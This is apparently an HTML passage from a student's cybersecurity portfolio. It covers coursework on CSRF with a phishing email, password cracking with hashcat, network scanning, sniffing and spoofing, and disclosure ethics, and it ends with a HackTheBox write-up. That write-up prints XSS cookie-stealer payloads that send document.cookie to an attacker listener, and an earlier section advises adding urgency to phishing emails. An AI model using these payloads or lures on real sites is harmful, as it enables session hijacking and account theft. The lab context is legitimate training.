          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
           </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
           <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
          <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
          it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
